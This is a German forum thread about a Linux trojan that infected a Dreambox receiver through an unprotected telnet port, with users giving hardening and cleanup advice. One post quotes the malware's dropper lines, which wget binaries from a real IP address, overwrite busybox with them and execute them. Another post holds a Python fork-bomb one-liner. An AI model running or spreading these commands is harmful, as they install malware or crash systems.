Linux Trojaner auf Dreambox

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Linux Trojaner auf Dreambox

      hi,

      mir ist vorgestern was auf der dreambox von user "Maly" aufgefallen, als ich ihm per Teamviewer
      geholfen habe, er hatte port 21/23 (max 10min) auf. Und direkt nach dem neuflashen des Image hat es einen
      Hintergrund Prozess mit wget gegeben, der ein script downloaded hat:

      Quellcode

      1. http://176.123.7.193/w.sh


      Das script downloaded diverse Sachen, welche am PC vom Antivirus Programm als LinuxTrojaner erkannt
      wurden.

      Wenn man nach der IP googled gibt es auch schon einen eintrag bei virustotal.org

      Seid also vorsichtig, wenn ihr Ports öffnet und kein Passwort gesetzt habt, kann das übel ausgehen.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

    • Hast du dir das angesehen, was da runtergeladen wird bzw. was der trojaner genau macht?. Scheinbar wird da die busybox um 5 Befehle "erweitert" und nach nach dem download findet man nichts mehr davon - weil in der busybox "versteckt". Übel ...
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

    • nein, das w.sh script ist nicht auf der Box

      so wie @deepblue2000 das beschreibt sucht da jemand (wohl per script) u.a. offene 23 ports (telnet) im Netz
      Wenn kein Passwortschutz vorhanden ist, wird per telnet verbunden und das w.sh script aus dem netz gesaugt und ausgeführt

      d..h. heisst vor allem NICHT port 23 (Telnet) auf der Box extern freigeben (portforwarding) - da können schon die paar Minuten nach dem Flashen bis zur Passwortvergabe reichen, dass sich das einnistet ...

      Am besten von extern nur Zugriff auf die Box per ssh (Tunnel) oder VPN zulassen - oder besser ganz die Finger davon lassen, wenn man nicht weiß, was man tut. Das ist wieder mal ein Beispiel, wie schnell sowas gehen kann
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

    • Angenommen du hast port 23 extern freigegeben - solange ein Passwort vergeben ist, kommt man auch nur mit diesem Passwort rein (was auch kein richtiger Schutz ist, weil unverschlüsselt)

      Wenn du dann aber neu flasht, ist die Box solange ohne Passwortschutz, bis du per telnet/SSH/Plugin etc. ein Passwort auf der Box vergibst, da das Image per default ohne Passwort ausgeliefert wird. Solange also kein Passwort vergeben ist, steht die Box ungeschützt im Netz, wenn port 23 extern freigegeben ist

      Im geschilderten Fall von @deepblue2000 ist scheinbar genau dieses worst case Szenario passiert, auch wenn die Box gerade mal 10 Minuten ohne Passwort war.

      ergo:
      nur passwortgeschützte Ports wie ssh extern freigeben. Solange kein Passwort gesetzt ist, kommt man per ssh nicht auf die Box. dropbear verlangt zwingend ein Passwort. Kannst ja mal testen. neu flashen, kein passwort vergeben und versuchen per ssh (im interenen Netz) verbinden: wird nicht funktonieren
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

    • nein, das ist vielen leider nicht bewusst - die sind oft schon froh, wenn sie von extern zugreifen können - egal wie.

      Du hast ja keine Ahnung was die Leute alles ungeschützt im Netz freigeben weil sie es nicht besser wissen (wollen) ...
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

    • ich hab hier so eine abus wlan cam, die hat so einige vorkonfigurierte portweiterleitungen, da möchte ich nicht wissen was da alles im netz landet wenn die einstellungen nicht angepasst werden =)

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von hmich ()

    • überprüfen könntest du das über die busybox, aber ich wollte das niciht ausreizen was das alles macht. Auf den ersten Blick sieht das aus, als patcht das script die busybox.

      Wenn der Trojaner mal auf der Box ist wird die Passwortänderung nur bedingt helfen. Wenn du auf Nummer sicher gehen willst, neu flashen (portforwarding vorher kurzfristig bis zur Passwortänderung deaktivierenI) oder die busybox neu installieren und rebooten - aber das letzere ohne Gewähr, weil ungetestet

      editiert
      cd /tmp
      opkg update
      opkg download busybox
      opkg remove --force-depends busybox
      opkg install /tmp/busybox*.ipk

      dann wird die busybox mit der originalen busybox vom Feed überschrieben

      Aber wie gesagt, am Besten erst gar nicht port 23 (telnet), 21 (FTP) und 80 (HTTP) extern freigeben sondern HTTPS, SSH, scp und/oder VPN nutzen
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

      Dieser Beitrag wurde bereits 4 mal editiert, zuletzt von Fred Bogus Trumper ()

    • Jeder der eine Fritzbox hat sollte sich VPN einrichten. Das geht mit neuerer Firmware ab 6.0 wirklich einfach, und man kann die VPN übers Handy, Tablet oder PC ohne Probleme benutzen. Und kostenloses Dyndns Äquivalent ist mit myfritz auch standardmäßig mit dabei, man benötigt also keinen dritten Bezahlservice wie dyndns.org. FTP und TELNET kann man heutzutage wirklich nicht mehr über Portforwarding freigeben, wenn dann SFTP oder SSH, was bei der Dreambox standardmäßig nicht drauf ist. Leider. Da sollte evtl. mal ein Umdenken stattfinden, und evtl. diese Services auch deaktiviert sein bevor man ein Password vergeben hat. Auch wenn diese Protokolle vielleicht nur fürs interne Netz gedacht sind, sieht man wie schnell etwas passiert wenn man nicht aufpasst.

    • Jeder sollte sich selber mal überlegen welche ports man öffnet .Und das fritzbox vpn ist wirklich stabil und schnell eingerichtet.
      Gerade bei dem ci+ zeugs heisst es aufgepasst den da wird es viele geben die sich das zu nutze machen wenn leute ohne vorkenntnisse sich irgendwelche apps installieren die automatisch als root ausgeführt werden.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • http://176.123.7.193 /w.sh / Ausgeführtes Script

      kann man das script von Linuxfachmännern untersuchen lassen, ich bin da überfordert ?(

      cd /tmp;rm -rf *;wget 176.123.7.193/dskljn;cat dskljn >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/kjdnc;cat kjdnc >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/sdokdljn;cat sdokdljn >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/sdalk;cat sdalk >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/akddx;cat akddx >busybox;chmod 777 busybox;./busybox
      cd /tmp; busybox wget 176.123.7.193/dskljn; chmod +x dskljn; ./dskljn; busybox rm -f dskljn*
      cd /tmp; busybox wget 176.123.7.193/kjdnc; chmod +x kjdnc; ./kjdnc; busybox rm -f kjdnc*
      cd /tmp; busybox wget 176.123.7.193/sdokdljn; chmod +x sdokdljn; ./sdokdljn; busybox rm -f sdokdljn*
      cd /tmp; busybox wget 176.123.7.193/sdalk; chmod +x sdalk; ./sdalk; busybox rm -f sdalk*
      cd /tmp; busybox wget 176.123.7.193/akddx; chmod +x akddx; ./akddx; busybox rm -f akddx*

    • aro1 schrieb:

      cd /tmp;rm -rf *;wget 176.123.7.193/dskljn;cat dskljn >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/kjdnc;cat kjdnc >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/sdokdljn;cat sdokdljn >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/sdalk;cat sdalk >busybox;chmod 777 busybox;./busybox
      cd /tmp;rm -rf *;wget 176.123.7.193/akddx;cat akddx >busybox;chmod 777 busybox;./busybox


      dass Script leert /tmp und läd nacheinander dskljn, kjdnc, sdokdljn, sdalk und akddx von der ULR herunter und überschreibt jeweils /tmp/busybox und und führt danach jeweils /tmp/busbox aus, das läuft dann bis zum nächsten reboot
      Was die einzelnen binaries genau machen, kann ich nicht sagen - aber sicher nichts Gutes ...

      der zuletzt gestartete Prozess könnte so ausgemacht werden

      ps -A|grep busybox

      wenn da eine Ausgabe kommt, sollten die Alarmglocken klingeln ...

      oder

      ls -1 /tmp|grep busybox

      wenn sich die Datei "busybox" in /tmp finden lässt, wäre auch in Indikator, dass sich das Ding eingenistet hat ...
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

    • Was an einem komplett quelloffenen CI Helferlein das nur lokale ports verwendet das man sich selbst compilieren kann ein Problem sein soll im unterschied zum camembert wo es oft nur das binary gibt muss mir auch wer erklaeren.